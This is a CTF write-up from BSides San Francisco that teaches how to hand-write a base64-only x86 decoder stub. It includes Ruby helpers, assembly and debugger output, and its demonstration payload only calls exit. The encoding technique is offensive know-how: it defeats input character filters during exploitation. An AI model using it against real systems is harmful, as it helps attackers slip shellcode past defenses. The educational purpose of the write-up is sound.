Hey everybody,

A couple months ago, we ran BSides San Francisco CTF. It was fun, and I posted blogs about it at the time, but I wanted to do a late writeup for the level b-64-b-tuff.

The challenge was to write base64-compatible shellcode. There's an easy solution - using an alphanumeric encoder - but what's the fun in that? (also, I didn't think of it :) ). I'm going to cover base64, but these exact same principles apply to alphanumeric - there's absolutely on reason you couldn't change the SET variable in my examples and generate alphanumeric shellcode.

In this post, we're going to write a base64 decoder stub by hand, which encodes some super simple shellcode. I'll also post a link to a tool I wrote to automate this.

I can't promise that this is the best, or the easiest, or even a sane way to do this. I came up with this process all by myself, but I have to imagine that the generally available encoders do basically the same thing. :)



Intro to Shellcode

I don't want to dwell too much on the basics, so I highly recommend reading PRIMER.md, which is a primer on assembly code and shellcode that I recently wrote for a workshop I taught.

The idea behind the challenge is that you send the server arbitrary binary data. That data would be encoded into base64, then the base64 string was run as if it were machine code. That means that your machine code had to be made up of characters in the set [a-zA-Z0-9+/] . You could also have an equal sign ("=") or two on the end, but that's not really useful.

We're going to mostly focus on how to write base64-compatible shellcode, then bring it back to the challenge at the very end.

Assembly instructions

Since each assembly instruction has a 1:1 relationship to the machine code it generates, it'd be helpful to us to get a list of all instructions we have available that stay within the base64 character set.

To get an idea of which instructions are available, I wrote a quick Ruby script that would attempt to disassemble every possible combination of two characters followed by some static data.

I originally did this by scripting out to ndisasm on the commandline, a tool that we'll see used throughout this blog, but I didn't keep that code. Instead, I'm going to use the Crabstone Disassembler, which is Ruby bindings for Capstone:

require ' crabstone ' SET = ' ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ ' ; cs = Crabstone :: Disassembler .new( Crabstone :: ARCH_X86 , Crabstone :: MODE_32 ) SET .chars.each do | c1 | SET .chars.each do | c2 | data = c1 + c2 + ( " A " * 14 ) instruction = cs.disasm(data, 0 )[ 0 ] puts " %s %s %s " % [ instruction.bytes.map() { | b | ' %02x ' % b }.join( ' ' ), instruction.mnemonic.to_s, instruction.op_str.to_s ] end end

I'd probably do it considerably more tersely in irb if I was actually solving a challenge rather than writing a blog, but you get the idea. :)

Anyway, running that produces quite a lot of output. We can feed it through sort + uniq to get a much shorter version.

From there, I manually went through the full 2000+ element list to figure out what might actually be useful (since the vast majority were basically identical, that's easier than it sounds). I moved all the good stuff to the top and got rid of the stuff that's useless for writing a decoder stub. That left me with this list. I left in a bunch of stuff (like multiply instructions) that probably wouldn't be useful, but that I didn't want to completely discount.

Dealing with a limited character set

When you write shellcode, there are a few things you have to do. At a minimum, you almost always have to change registers to fairly arbitrary values (like a command to execute, a file to read/write, etc) and make syscalls ("int 0x80" in assembly or "\xcd\x80" in machine code; we'll see how that winds up being the most problematic piece!).

For the purposes of this blog, we're going to have 12 bytes of shellcode: a simple call to the sys_exit() syscall, with a return code of 0x41414141. The reason is, it demonstrates all the fundamental concepts (setting variables and making syscalls), and is easy to verify as correct using strace

Here's the shellcode we're going to be working with:

mov eax , 0x01 mov ebx , 0x41414141 int 0x80

We'll be using this code throughout, so make sure you have a pretty good grasp of it! It assembles to (on Ubuntu, if this fails, try apt-get install nasm ):

$ echo -e ' bits 32



mov eax, 0x01

mov ebx, 0x41414141

int 0x80

' > file.asm; nasm -o file file.asm $ hexdump -C file 00000000 b8 01 00 00 00 bb 41 41 41 41 cd 80 |............|

If you want to try running it, you can use my run_raw_code.c utility (there are plenty just like it):

$ strace ./run_raw_code file [ ... ] read ( 3 , " \270 \1 \0\0\0\273 AAAA \315 \200 " , 12 ) = 12 exit ( 1094795585 ) = ?

The read() call is where the run_raw_code stub is reading the shellcode file. The 1094795585 in exit() is the 0x41414141 that we gave it. We're going to see that value again and again and again, as we evaluate the correctness of our code, so get used to it!

You can also prove that it disassembles properly, and see what each line becomes using the ndisasm utility (this is part of the nasm package):

$ ndisasm - b32 file 00000000 B801000000 mov eax , 0x1 00000005 BB41414141 mov ebx , 0x41414141 0000000 A CD80 int 0x80

Easy stuff: NUL byte restrictions

Let's take a quick look at a simple character restriction: NUL bytes. It's commonly seen because NUL bytes represent string terminators. Functions like strcpy() stop copying when they reach a NUL. Unlike base64, this can be done by hand!

It's usually pretty straight forward to get rid of NUL bytes by just looking at where they appear and fixing them; it's almost always the case that it's caused by 32-bit moves or values, so we can just switch to 8-bit moves (using eax is 32 bits; using al , the last byte of eax, is 8 bits):

xor eax , eax inc eax mov ebx , 0x41414141 int 0x80

We can prove this works, as well (I'm going to stop showing the echo as code gets more complex, but I use file.asm throughout):

$ echo -e ' bits 32



xor eax, eax

inc eax

mov ebx, 0x41414141

int 0x80

' > file.asm; nasm -o file file.asm $ hexdump -C file 00000000 31 c0 40 bb 41 41 41 41 cd 80 | 1 .@.AAAA..|

Simple!

Clearing eax in base64

Something else to note: our shellcode is now largely base64! Let's look at the disassembled version so we can see where the problems are:

$ ndisasm - b32 file 65 [ 11 : 16 : 34 ] 00000000 31 C0 xor eax , eax 00000002 40 inc eax 00000003 BB41414141 mov ebx , 0x41414141 0000000 8 CD80 int 0x80

Okay, maybe we aren't so close: the only line that's actually compatible is "inc eax". I guess we can start the long journey!

Let's start by looking at how we can clear eax using our instruction set. We have a few promising instructions for changing eax, but these are the ones I like best:

35 ?? ?? ?? ?? xor eax,0x????????

68 ?? ?? ?? ?? push dword 0x????????

58 pop eax

Let's start with the most naive approach:

push 0 pop eax

If we assemble that, we get:

00000000 6 A00 push byte + 0x0 00000002 58 pop eax

Close! But because we're pushing 0, we end up with a NUL byte. So let's push something else:

push 0x41414141 pop eax

If we look at how that assembles, we get:

00000000 68 41 41 41 41 58 |hAAAAX|

Not only is it all Base64 compatible now, it also spells "hAAAAX" , which is a fun coincidence. :)

The problem is, eax doesn't end up as 0, it's 0x41414141. You can verify this by adding "int 3" at the bottom, dumping a corefile, and loading it in gdb (feel free to use this trick throughout if you're following along, I'm using it constantly to verify my code snippings, but I'll only show it when the values are important):

$ ulimit -c unlimited $ rm core $ cat file.asm bits 32 push 0x41414141 pop eax int 3 $ nasm -o file file.asm $ ./run_raw_code ./file allocated 8 bytes of executable memory at: 0x41410000 fish: “./run_raw_code ./file” terminated by signal SIGTRAP ( Trace or breakpoint trap ) $ gdb ./run_raw_code ./core Core was generated by `./run_raw_code ./file` . Program terminated with signal SIGTRAP, Trace/breakpoint trap . ( gdb ) print /x $eax $1 = 0x41414141

Anyway, if we don't like the value, we can xor a value with eax, provided that the value is also base64-compatible! So let's do that:

push 0x41414141 pop eax xor eax , 0x41414141

Which assembles to:

00000000 68 41 41 41 41 58 35 41 41 41 41 |hAAAAX5AAAA|

All right! You can verify using the debugger that, at the end, eax is, indeed, 0.

Encoding an arbitrary value in eax

If we can set eax to 0, does that mean we can set it to anything?

Since xor works at the byte level, the better question is: can you xor two base-64-compatible bytes together, and wind up with any byte?

Turns out, the answer is no. Not quite. Let's look at why!

We'll start by trying a pure bruteforce (this code is essentially from my solution):

SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'; def find_bytes (b) SET .bytes.each do | b1 | SET .bytes.each do | b2 | if ((b1 ^ b2) == b) return [b1, b2] end end end puts( " Error: Couldn't encode 0x%02x! " % b) return nil end 0 .upto( 255 ) do | i | puts( " %x => %s " % [i, find_bytes(i)]) end

The full output is here, but the summary is:

0 => [ 65 , 65 ] 1 => [ 66 , 67 ] 2 => [ 65 , 67 ] 3 => [ 65 , 66 ] ... 7d => [ 68 , 57 ] 7e => [ 70 , 56 ] 7f => [ 70 , 57 ] Error : Couldn ' t encode 0x80! 80 => Error: Couldn ' t encode 0x81 ! 81 => Error : Couldn ' t encode 0x82! 82 => ...

Basically, we can encode any value that doesn't have the most-significant bit set (ie, anything under 0x80). That's going to be a problem that we'll deal with much, much later.

Since many of our instructions operate on 4-byte values, not 1-byte values, we want to operate in 4-byte chunks. Fortunately, xor is byte-by-byte, so we just need to treat it as four individual bytes:

def get_xor_values_32 (desired) b1, b2, b3, b4 = [desired].pack( ' N ' ).bytes() v1 = find_bytes(b1) v2 = find_bytes(b2) v3 = find_bytes(b3) v4 = find_bytes(b4) result = [ [v1[ 0 ], v2[ 0 ], v3[ 0 ], v4[ 0 ]].pack( ' cccc ' ).unpack( ' N ' ).pop(), [v1[ 1 ], v2[ 1 ], v3[ 1 ], v4[ 1 ]].pack( ' cccc ' ).unpack( ' N ' ).pop(), ] puts ' 0x%08x ' % result[ 0 ] puts ' 0x%08x ' % result[ 1 ] puts( ' ---------- ' ) puts( ' 0x%08x ' % (result[ 0 ] ^ result[ 1 ])) puts() return result end

This function takes a single 32-bit value and it outputs the two xor values (note that this won't work when the most significant bit is set.. stay tuned for that!):

irb(main):039: 0 > get_xor_values_32( 0x01020304 ) 0x42414141 0x43434245 ---------- 0x01020304 => [ 1111572801 , 1128481349 ] irb(main): 040 : 0 > get_xor_values_32( 0x41414141 ) 0x6a6a6a6a 0x2b2b2b2b ---------- 0x41414141 => [ 1785358954 , 724249387 ]

And so on.

So if we want to set eax to 0x00000001 (for the sys_exit syscall), we can simply feed it into this code and convert it to assembly:

get_xor_values_32( 0x01 ) 0x41414142 0x41414143 ---------- 0x00000001 => [ 1094795586 , 1094795587 ]

Then write the shellcode:

push 0x41414142 pop eax xor eax , 0x41414143

And prove to ourselves that it's base-64-compatible; I believe in doing this, because every once in awhile an instruction like "inc eax" (which becomes '@') will slip in when I'm not paying attention:

$ hexdump -C file 00000000 68 42 41 41 41 58 35 43 41 41 41 |hBAAAX5CAAA|

We'll be using that exact pattern a lot - push (value) / pop eax / xor eax, (other value). It's the most fundamental building block of this project!

Setting other registers

Sadly, unless I missed something, there's no easy way to set other registers. We can increment or decrement them, and we can pop values off the stack into some of them, but we don't have the ability to xor, mov, or anything else useful!

There are basically three registers that we have easy access to:

58 pop eax

59 pop ecx

5A pop edx

So to set ecx to an arbitrary value, we can do it via eax:

push 0x41414142 pop eax xor eax , 0x41414143 push eax pop ecx

Then verify the base64-ness:

$ hexdump -C file 00000000 68 42 41 41 41 58 35 43 41 41 41 50 59 |hBAAAX5CAAAPY|

Unfortunately, if we try the same thing with ebx, we hit a non-base64 character:

$ hexdump -C file 00000000 68 42 41 41 41 58 35 43 41 41 41 50 5b |hBAAAX5CAAAP [ |

Note the "[" at the end - that's not in our character set! So we're pretty much limited to using eax, ecx, and edx for most things.

But wait, there's more! We do, however, have access to popad. The popad instruction pops the next 8 things off the stack and puts them in all 8 registers. It's a bit of a scorched-earth method, though, because it overwrites all registers. We're going to use it at the start of our code to zero-out all the registers.

Let's try to convert our exit shellcode from earlier:

mov eax , 0x01 mov ebx , 0x41414141 int 0x80

Into something that's base-64 friendly:

push 0x41414141 push 0x41414141 push 0x41414141 push 0x41414141 push 0x41414141 push 0x41414141 push 0x41414141 push 0x41414141 popad push 0x41414142 pop eax xor eax , 0x41414143 int 0x80

Prove that it uses only base64 characters (except the syscall):

$ hexdump -C file 00000000 68 41 41 41 41 68 41 41 41 41 68 41 41 41 41 68 |hAAAAhAAAAhAAAAh| 00000010 41 41 41 41 68 41 41 41 41 68 41 41 41 41 68 41 |AAAAhAAAAhAAAAhA| 00000020 41 41 41 68 41 41 41 41 61 68 42 41 41 41 58 35 |AAAhAAAAahBAAAX5| 00000030 43 41 41 41 cd 80 |CAAA..|

And prove that it still works:

$ strace ./run_raw_code ./file ... read ( 3 , " hAAAAhAAAAhAAAAhAAAAhAAAAhAAAAhA " ..., 54 ) = 54 exit ( 1094795585 ) = ?

Encoding the actual code

You've probably noticed by now: this is a lot of work. Especially if you want to set each register to a different non-base64-compatible value! You have to encode each value by hand, making sure you set eax last (because it's our working register). And what if you need an instruction (like add, or shift) that isn't available? Do we just simulate it?

As I'm sure you've noticed, the machine code is just a bunch of bytes. What's stopping us from simply encoding the machine code rather than just values?

Let's take our original example of an exit again:

mov eax , 0x01 mov ebx , 0x41414141 int 0x80

Because 'mov' assembles to 0xb8XXXXXX, I don't want to deal with that yet (the most-significant bit is set). So let's change it a bit to keep each byte (besides the syscall) under 0x80:

00000000 6 A01 push byte + 0x1 00000002 58 pop eax 00000003 6841414141 push dword 0x41414141 0000000 8 5 B pop ebx

Or, as a string of bytes:

"\x6a\x01\x58\x68\x41\x41\x41\x41\x5b"

Let's pad that to a multiple of 4 so we can encode in 4-byte chunks (we pad with 'A', because it's as good a character as any):

"\x6a\x01\x58\x68\x41\x41\x41\x41\x5b\x41\x41\x41"

then break that string into 4-byte chunks, encoding as little endian (reverse byte order):

6a 01 58 68 -> 0x6858016a

41 41 41 41 -> 0x41414141

5b 41 41 41 -> 0x4141415b

Then run each of those values through our get_xor_values_32() function from earlier:

irb(main): 047 : 0 > puts ' 0x%08x ^ 0x%08x ' % get_xor_values_32( 0x6858016a ) 0x43614241 ^ 0x2b39432b irb(main):048: 0 > puts ' 0x%08x ^ 0x%08x ' % get_xor_values_32( 0x41414141 ) 0x6a6a6a6a ^ 0x2b2b2b2b irb(main): 050 : 0 > puts ' 0x%08x ^ 0x%08x ' % get_xor_values_32( 0x4141415b ) 0x6a6a6a62 ^ 0x2b2b2b39

Let's start our decoder by simply calculating each of these values in eax, just to prove that they're all base64-compatible (note that we are simply discarding the values in this example, we aren't doing anything with them quite yet):

push 0x43614241 pop eax xor eax , 0x2b39432b push 0x6a6a6a6a pop eax xor eax , 0x2b2b2b2b push 0x6a6a6a62 pop eax xor eax , 0x2b2b2b39

Which assembles to:

$ hexdump -Cv file 00000000 68 41 42 61 43 58 35 2b 43 39 2b 68 6a 6a 6a 6a |hABaCX5+C9+hjjjj| 00000010 58 35 2b 2b 2b 2b 68 62 6a 6a 6a 58 35 39 2b 2b |X5++++hbjjjX59++| 00000020 2b |+|

Looking good so far!

Decoder stub

Okay, we've proven that we can encode instructions (without the most significant bit set)! Now we actually want to run it!

Basically: our shellcode is going to start with a decoder, followed by a bunch of encoded bytes. We'll also throw some padding in between to make this easier to do by hand. The entire decoder has to be made up of base64-compatible bytes, but the encoded payload (ie, the shellcode) has no restrictions.

So now we actually want to alter the shellcode in memory (self-rewriting code!). We need an instruction to do that, so let's look back at the list of available instructions! After some searching, I found one that's promising:

3151 ?? xor [ ecx +0 x ??], edx

This command xors the 32-bit value at memory address ecx+0x?? with edx . We know we can easily control ecx (push (value) / pop eax / xor (other value) / push eax / pop ecx) and, similarly edx. Since the "0x??" value has to also be a base64 character, we'll follow our trend and use [ecx+0x41], which gives us:

3151 41 xor [ ecx +0 x 41], edx

Once I found that command, things started coming together! Since I can control eax, ecx, and edx pretty cleanly, that's basically the perfect instruction to decode our shellcode in-memory!

This is somewhat complex, so let's start by looking at the steps involved:

Load the encoded shellcode (half of the xor pair, ie, the return value from get_xor_values_32()) into a known memory address (in our case, it's going to be 0x141 bytes after the start of our code)

Set ecx to the value that's 0x41 bytes before that encoded shellcode (0x100)

For each 32-bit pair in the encoded shellcode... Load the other half of the xor pair into edx Do the xor to alter it in-memory (ie, decode it back to the original, unencoded value) Increment ecx to point at the next value Repeat for the full payload

Run the newly decoded payload

For the sake of our sanity, we're going to make some assumptions in the code: first, our code is loaded to the address 0x41410000 (which it is, for this challenge). Second, the decoder stub is exactly 0x141 bytes long (we will pad it to get there). Either of these can be easily worked around, but it's not necessary to do the extra work in order to grok the decoder concept.

Recall that for our sys_exit shellcode, the xor pairs we determined were: 0x43614241 ^ 0x2b39432b, 0x6a6a6a6a ^ 0x2b2b2b2b, and 0x6a6a6a62 ^ 0x2b2b2b39.

Here's the code:

push 0x6a6a4241 pop eax xor eax , 0x2b2b4341 push eax pop ecx push 0x43614241 pop edx xor [ ecx + 0x41 ], edx inc ecx inc ecx inc ecx inc ecx push 0x6a6a6a6a pop edx xor [ ecx + 0x41 ], edx inc ecx inc ecx inc ecx inc ecx push 0x6a6a6a62 pop edx xor [ ecx + 0x41 ], edx db ' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ' db ' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ' db ' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ' db ' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ' db ' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ' db ' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ' db ' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ' db ' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ' db ' AAAAAAAAAAAAAAAAA ' dd 0x2b39432b dd 0x2b2b2b2b dd 0x2b2b2b39 int 0x80

All right! Here's what it gives us; note that other than the syscall at the end (we'll get to that, I promise!), it's all base64:

$ hexdump -Cv file 00000000 68 41 42 6a 6a 58 35 41 43 2b 2b 50 59 68 41 42 |hABjjX5AC++PYhAB| 00000010 61 43 5a 31 51 41 41 41 41 41 68 6a 6a 6a 6a 5a |aCZ1QAAAAAhjjjjZ| 00000020 31 51 41 41 41 41 41 68 62 6a 6a 6a 5a 31 51 41 |1QAAAAAhbjjjZ1QA| 00000030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000050 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000060 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000070 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000080 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000090 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000000a0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000000b0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000000c0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000000d0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000000e0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 000000f0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000100 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000110 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000120 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000130 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA| 00000140 41 2b 43 39 2b 2b 2b 2b 2b 39 2b 2b 2b cd 80 |A+C9+++++9+++..|

To run this, we have to patch run_raw_code.c to load the code to the correct address:

diff --git a/forensics/ximage/solution/run_raw_code.c b/forensics/ximage/solution/run_raw_code.c index 9eadd5e..1ad83f1 100644 --- a/forensics/ximage/solution/run_raw_code.c +++ b/forensics/ximage/solution/run_raw_code.c @@ -12,7 +12,7 @@ int main(int argc, char *argv[]){ exit(0); } - void * a = mmap(0, statbuf.st_size, PROT_EXEC |PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); + void * a = mmap(0x41410000, statbuf.st_size, PROT_EXEC |PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); printf("allocated %d bytes of executable memory at: %p

", statbuf.st_size, a); FILE *file = fopen(argv[1], "rb");

You'll also have to compile it in 32-bit mode:

$ gcc -m32 -o run_raw_code run_raw_code.c

Once that's done, give 'er a shot:

$ strace ~ / projects / ctf-2017-release/forensics/ximage/solution/run_raw_code ./file [...] read( 3 , " hABjjX5AC++PYhABaCZ1QAAAAAhjjjjZ " ..., 335 ) = 335 exit ( 1094795585 ) = ?

We did it, team!

If we want to actually inspect the code, we can change the very last padding 'A' into 0xcc (aka, int 3, or a SIGTRAP):

$ diff -u file.asm file-trap.asm --- file.asm 2017-06-11 13:17:57.766651742 -0700 +++ file-trap.asm 2017-06-11 13:17:46.086525100 -0700 @@ -45,7 +45,7 @@ db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' -db 'AAAAAAAAAAAAAAAAA' +db 'AAAAAAAAAAAAAAAA', 0xcc ; Now, the second halves of our xor pairs dd 0x2b39432b

And run it with corefiles enabled:

$ nasm -o file file.asm $ ulimit -c unlimited $ ~ / projects / ctf-2017-release/forensics/ximage/solution/run_raw_code ./file allocated 335 bytes of executable memory at : 0x41410000 fish : “~ / projects / ctf-2017-release/ for ...” terminated by signal SIGTRAP ( Trace or breakpoint trap ) $ gdb ~ / projects / ctf-2017-release/forensics/ximage/solution/run_raw_code ./core Core was generated by ` /home/ron/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./fi ` . Program terminated with signal SIGTRAP , Trace /breakpoint trap . (gdb) x/ 10i $eip => 0x41410141 : push 0x1 0x41410143 : pop eax 0x41410144 : push 0x41414141 0x41410149 : pop ebx 0x4141014a : inc ecx 0x4141014b : inc ecx 0x4141014c : inc ecx 0x4141014d : int 0x80 0x4141014f : add BYTE PTR [eax],al 0x41410151 : add BYTE PTR [eax],al

As you can see, our original shellcode is properly decoded! (The inc ecx instructions you're seeing is our padding.)

The decoder stub and encoded shellcode can be quite easily generated programmatically rather than doing it by hand, which is extremely error prone (it took me 4 tries to get it right - I messed up the start address, I compiled run_raw_code in 64-bit mode, and I got the endianness backwards before I finally got it right, which doesn't sound so bad, except that I had to go back and re-write part of this section and re-run most of the commands to get the proper output each time :) ).

That pesky most-significant-bit

So, I've been avoiding this, because I don't think I solved it in a very elegant way. But, my solution works, so I guess that's something. :)

As usual, we start by looking at our set of available instructions to see what we can use to set the most significant bit (let's start calling it the "MSB" to save my fingers).

Unfortunately, the easy stuff can't help us; xor can only set it if it's already set somewhere, we don't have any shift instructions, inc would take forever, and the subtract and multiply instructions could probably work, but it would be tricky.

Let's start with a simple case: can we set edx to 0x80?

First, let's set edx to the highest value we can, 0x7F (we choose edx because a) it's one of the three registers we can easily pop into; b) eax is our working variable since it's the only one we can xor; and c) we don't want to change ecx once we start going, since it points to the memory we're decoding):

irb(main): 057 : 0 > puts ' 0x%08x ^ 0x%08x ' % get_xor_values_32( 0x0000007F ) 0x41414146 ^ 0x41414139

Using those values and our old push / pop / xor pattern, we can set edx to 0x80:

push 0x41414146 pop eax xor eax , 0x41414139 push eax pop edx inc edx

That works out to:

00000000 68 46 41 41 41 58 35 39 41 41 41 50 5a 42 |hFAAAX59AAAPZB|

So far so good! Now we can do our usual xor to set that one bit in our decoded code:

xor [ ecx + 0x41 ], edx

This sets the MSB of whatever ecx+0x41 (our current instruction) is.

If we were decoding a single bit at a time, we'd be done. Unfortunately, we aren't so lucky - we're working in 32-bit (4-byte) chunks.

Setting edx to 0x00008000, 0x00800000, or 0x80000000

So how do we set edx to 0x00008000, 0x00800000, or 0x80000000 without having a shift instruction?

This is where I introduce a pretty ugly hack. In effect, we use some stack shenanigans to perform a poor-man's shift. This won't work on most non-x86/x64 systems, because they require a word-aligned stack (I was actually a little surprised it worked on x86, to be honest!).

Let's say we want 0x00008000. Let's just look at the code:

push 0x41414141 pop eax xor eax , 0x41414141 push eax push eax push eax push eax push eax push eax push eax push eax popad push 0x41414146 pop eax xor eax , 0x41414139 push eax pop edx inc edx push edi push edx dec esp pop edx inc esp int 3

And we can use gdb to prove it works with the same trick as before:

$ nasm -o file file.asm $ rm -f core $ ulimit -c unlimited $ ./run_raw_code ./file allocated 41 bytes of executable memory at: 0x41410000 fish: “~/projects/ctf-2017-release/for...” terminated by signal SIGTRAP ( Trace or breakpoint trap ) $ gdb ./run_raw_code ./core Program terminated with signal SIGTRAP, Trace/breakpoint trap . ( gdb ) print /x $edx $1 = 0x8000

We can do basically the exact same thing to set the third byte:

push edi push edx dec esp dec esp pop edx inc esp inc esp

And the fourth:

push edi push edx dec esp dec esp dec esp pop edx inc esp inc esp inc esp

Putting it all together

You can take a look at how I do this in my final code. It's going to be a little different, because instead of using our xor trick to set edx to 0x7F, I instead push 0x7a / pop edx / increment 6 times. The only reason is that I didn't think of the xor trick when I was writing the original code, and I don't want to mess with it now.

But, we're going to do it the hard way: by hand! I'm literally writing this code as I write the blog (and, message from the future: it worked on the second try :) ).

Let's just stick with our simple exit-with-0x41414141-status shellcode:

mov eax , 0x01 mov ebx , 0x41414141 int 0x80

Which assembles to this, which is conveniently already a multiple of 4 bytes so no padding required:

00000000 b8 01 00 00 00 bb 41 41 41 41 cd 80 |......AAAA..|

Since we're doing it by hand, let's extract all the MSBs into a separate string (remember, this is all done programmatically usually):

00000000 38 01 00 00 00 3b 41 41 41 41 4d 00 |......AAAA..| 00000000 80 00 00 00 00 80 00 00 00 00 80 80 |......AAAA..|

If you xor those two strings together, you'll get the original string back.

First, let's worry about the first string. It's handled exactly the way we did the last example. We start by getting the three 32-bit values as little endian values:

38 01 00 00 -> 0x00000138

00 3b 41 41 -> 0x41413b00

41 41 4d 00 -> 0x004d4141

And then find the xor pairs to generate them just like before:

irb(main): 061 : 0 > puts ' 0x%08x ^ 0x%08x ' % get_xor_values_32( 0x00000138 ) 0x41414241 ^ 0x41414379 irb(main): 062 : 0 > puts ' 0x%08x ^ 0x%08x ' % get_xor_values_32( 0x41413b00 ) 0x6a6a4141 ^ 0x2b2b7a41 irb(main): 063 : 0 > puts ' 0x%08x ^ 0x%08x ' % get_xor_values_32( 0x004d4141 ) 0x41626a6a ^ 0x412f2b2b

But here's where the twist comes: let's take the MSB string above, and also convert that to little-endian integers:

80 00 00 00 -> 0x00000080

00 80 00 00 -> 0x00008000

00 00 80 80 -> 0x80800000

Now, let's try writing our decoder stub just like before, except that after decoding the MSB-free vale, we're going to separately inject the MSBs into the code!

push 0x41414141 pop eax xor eax , 0x41414141 push eax push eax push eax push eax push eax push eax push eax push eax popad push 0x6a6a4241 pop eax xor eax , 0x2b2b4341 push eax pop ecx push 0x41414241 pop edx xor [ ecx + 0x41 ], edx push 0x41414146 pop eax xor eax , 0x41414139 push eax pop edx inc edx xor [ ecx + 0x41 ], edx inc ecx inc ecx inc ecx inc ecx push 0x6a6a4141 pop edx xor [ ecx + 0x41 ], edx push 0x41414146 pop eax xor eax , 0x41414139 push eax pop edx inc edx push edi push edx dec esp pop edx inc esp xor [ ecx + 0x41 ], edx inc ecx inc ecx inc ecx inc ecx push 0x41626a6a pop edx xor [ ecx + 0x41 ], edx push 0x41414146 pop eax xor eax , 0x41414139 push eax pop edx inc edx push edi push edx dec esp dec esp pop edx inc esp inc esp xor [ ecx + 0x41 ], edx push 0x41414146 pop eax xor eax , 0x41414139 push eax pop edx inc edx push edi push edx dec esp dec esp dec esp pop edx inc esp inc esp inc esp xor [ ecx + 0x41 ], edx db ' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ' db ' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ' db ' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ' db ' AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ' db ' AAAAAAAAAAAAAAAAAAAA ' dd 0x41414379 dd 0x2b2b7a41 dd 0x412f2b2b

And that's it! Let's try it out! The code leading up to the padding assembles to:

00000000 68 41 41 41 41 58 35 41 41 41 41 50 50 50 50 50 |hAAAAX5AAAAPPPPP| 00000010 50 50 50 61 68 41 42 6a 6a 58 35 41 43 2b 2b 50 |PPPahABjjX5AC++P| 00000020 59 68 41 42 41 41 5a 31 51 41 68 46 41 41 41 58 |YhABAAZ1QAhFAAAX| 00000030 35 39 41 41 41 50 5a 42 31 51 41 41 41 41 41 68 |59AAAPZB1QAAAAAh| 00000040 41 41 6a 6a 5a 31 51 41 68 46 41 41 41 58 35 39 |AAjjZ1QAhFAAAX59| 00000050 41 41 41 50 5a 42 57 52 4c 5a 44 31 51 41 41 41 |AAAPZBWRLZD1QAAA| 00000060 41 41 68 6a 6a 62 41 5a 31 51 41 68 46 41 41 41 |AAhjjbAZ1QAhFAAA| 00000070 58 35 39 41 41 41 50 5a 42 57 52 4c 4c 5a 44 44 |X59AAAPZBWRLLZDD| 00000080 31 51 41 68 46 41 41 41 58 35 39 41 41 41 50 5a |1QAhFAAAX59AAAPZ| 00000090 42 57 52 4c 4c 4c 5a 44 44 44 31 51 41 |BWRLLLZDDD1QA|

We can verify it's all base64 by eyeballing it. We can also determine that it's 0x9d bytes long, which means to get to 0x141 we need to pad it with 0xa4 bytes (already included above) before the encoded data.

We can dump allll that code into a file, and run it with run_raw_code (don't forget to apply the patch from earlier to change the base address to 0x41410000, and don't forget to compile with -m32 for 32-bit mode):

$ nasm -o file file.asm $ strace ./run_raw_code ./file read ( 3 , " hAAAAX5AAAAPPPPPPPPahABjjX5AC++P " ..., 333 ) = 333 exit ( 1094795585 ) = ? +++ exited with 65 +++

It works! And it only took me two tries (I missed the 'inc ecx' lines the first time :) ).

I realize that it's a bit inefficient to encode 3 lines into like 100, but that's the cost of having a limited character set!

Solving the level

Bringing it back to the actual challenge...

Now that we have working base 64 code, the rest is pretty simple. Since the app encodes the base64 for us, we have to take what we have and decode it first, to get the string that would generate the base64 we want.

Because base64 works in blocks and has padding, we're going to append a few meaningless bytes to the end so that if anything gets messed up by being a partial block, they will.

Here's the full "exploit", assembled:

